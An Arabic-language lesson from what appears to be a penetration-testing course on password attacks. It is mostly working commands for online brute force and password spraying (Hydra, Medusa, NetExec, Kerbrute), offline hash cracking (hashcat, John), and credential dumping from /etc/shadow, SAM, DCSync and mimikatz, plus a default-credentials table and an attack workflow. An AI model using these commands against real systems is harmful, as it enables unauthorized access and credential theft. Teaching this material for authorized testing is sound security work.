الدرس 12 من 24

تحليل الثغرات والاستغلال

هجمات كلمات المرور

4 دقيقة للقراءة

هجمات كلمات المرور تبقى من أكثر الطرق فعالية للحصول على الوصول. يغطي هذا الدرس تقنيات كسر كلمات المرور عبر الإنترنت وبدون اتصال.

هجمات كلمات المرور عبر الإنترنت

الهجمات عبر الإنترنت تستهدف الخدمات الحية. استخدمها بحذر لتجنب قفل الحسابات.

Hydra (متعدد البروتوكولات)

القوة الغاشمة لـ SSH:

hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10

FTP:

hydra -L users.txt -P passwords.txt ftp://10.10.10.10

تسجيل دخول HTTP POST:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"

SMB:

hydra -L users.txt -P passwords.txt smb://10.10.10.10

خيارات Hydra

العلمالغرض
-lاسم مستخدم واحد
-Lقائمة أسماء مستخدمين
-pكلمة مرور واحدة
-Pقائمة كلمات مرور
-tالخيوط (افتراضي 16)
-fالتوقف بعد أول مطابقة
-vإخراج تفصيلي

NetExec (formerly CrackMapExec) — Windows/AD

# رش كلمة مرور SMB
nxc smb 10.10.10.10 -u users.txt -p passwords.txt

# WinRM
nxc winrm 10.10.10.10 -u user -p password

# فحص المسؤول المحلي
nxc smb 10.10.10.10 -u user -p password --local-auth

Medusa

# هجوم SSH
medusa -h 10.10.10.10 -u admin -P passwords.txt -M ssh

# HTTP
medusa -h 10.10.10.10 -u admin -P passwords.txt -M http -m DIR:/admin

كسر كلمات المرور بدون اتصال

الهجمات بدون اتصال تعمل على الهاشات الملتقطة بدون تفاعل شبكي.

تحديد الهاش

# باستخدام hashid
hashid 'hash_here'

# باستخدام hash-identifier
hash-identifier

# أنماط الهاش الشائعة
MD5:         32 حرف سداسي عشري
SHA1:        40 حرف سداسي عشري
SHA256:      64 حرف سداسي عشري
NTLM:        32 حرف سداسي عشري (Windows)
bcrypt:      بادئة $2a$2b$2y$

Hashcat (بقوة GPU)

الاستخدام الأساسي:

hashcat -m <mode> hash.txt wordlist.txt

الأوضاع الشائعة:

الوضعنوع الهاش
0MD5
100SHA1
1400SHA256
1000NTLM
3200bcrypt
1800sha512crypt ($6$)
500md5crypt ($1$)
13100Kerberoast
18200AS-REP Roast

كسر NTLM:

hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt

مع القواعد:

hashcat -m 1000 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule

John the Ripper

الاستخدام الأساسي:

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

تحديد الصيغة:

john --format=raw-md5 --wordlist=rockyou.txt hashes.txt
john --format=nt --wordlist=rockyou.txt ntlm_hashes.txt

إظهار المكسورة:

john --show hashes.txt

استخراج الهاشات

هاشات كلمات مرور Linux

# الهاشات مخزنة في /etc/shadow
# الصيغة: user:$id$salt$hash:...

# Unshadow لـ John
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john unshadowed.txt

هاشات كلمات مرور Windows

من قاعدة بيانات SAM (محلي):

# مع Impacket (إذا كان لديك وصول مسؤول)
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

# باستخدام mimikatz على الهدف
mimikatz# sekurlsa::logonpasswords

من وحدة تحكم النطاق:

# هجوم DCSync
impacket-secretsdump domain.local/admin:password@10.10.10.10

هجمات رش كلمة المرور

رش كلمة مرور واحدة على العديد من المستخدمين لتجنب القفل:

# باستخدام NetExec
nxc smb 10.10.10.10 -u users.txt -p 'Password123!' --continue-on-success

# باستخدام Kerbrute (Kerberos)
kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt 'Password123!'

قوائم الكلمات

قوائم كلمات Kali المدمجة

/usr/share/wordlists/
├── rockyou.txt           # الأكثر شيوعاً
├── dirb/common.txt       # دلائل الويب
├── dirbuster/            # المزيد من قوائم كلمات الويب
└── seclists/             # مجموعة شاملة

قوائم كلمات مخصصة

باستخدام cewl:

# توليد قائمة كلمات من موقع
cewl http://10.10.10.10 -w custom_wordlist.txt

# مع العمق والحد الأدنى لطول الكلمة
cewl http://10.10.10.10 -d 2 -m 5 -w custom.txt

باستخدام crunch:

# توليد جميع التركيبات من 4 أحرف
crunch 4 4 abcdefghijklmnopqrstuvwxyz -o wordlist.txt

# مع نمط
crunch 8 8 -t Pass@@%% -o wordlist.txt
# @ = حروف صغيرة، , = حروف كبيرة، % = رقم، ^ = رمز

بيانات الاعتماد الافتراضية الشائعة

جرب هذه دائماً قبل القوة الغاشمة:

الخدمةاسم المستخدمكلمة المرور
SSHroot، adminroot، admin، password
MySQLroot(فارغ)، root، mysql
PostgreSQLpostgrespostgres
Tomcattomcat، admintomcat، admin، s3cret
Jenkinsadminadmin
phpMyAdminroot(فارغ)
WordPressadminadmin

سير عمل هجوم كلمة المرور

1. استطلاع المستخدمين
   └── SMTP، RID cycling، استطلاع الويب

2. تجربة بيانات الاعتماد الافتراضية
   └── فحص وثائق الخدمة

3. رش كلمة المرور (إذا كان هناك العديد من المستخدمين)
   └── كلمات مرور شائعة: Password1، Welcome1

4. القوة الغاشمة المستهدفة (إذا كان هناك قليل من المستخدمين)
   └── hydra مع rockyou.txt

5. الكسر بدون اتصال (إذا تم الحصول على هاشات)
   └── hashcat مع القواعد

مع إتقان تقنيات الاستغلال، سننتقل لهجمات تطبيقات الويب في الوحدة التالية. :::

مراجعة سريعة: كيف تجد هذا الدرس؟

اختبار

الوحدة 3: تحليل الثغرات والاستغلال

خذ الاختبار
نشرة أسبوعية مجانية

ابقَ على مسار النيرد

بريد واحد أسبوعياً — دورات، مقالات معمّقة، أدوات، وتجارب ذكاء اصطناعي.

بدون إزعاج. إلغاء الاشتراك في أي وقت.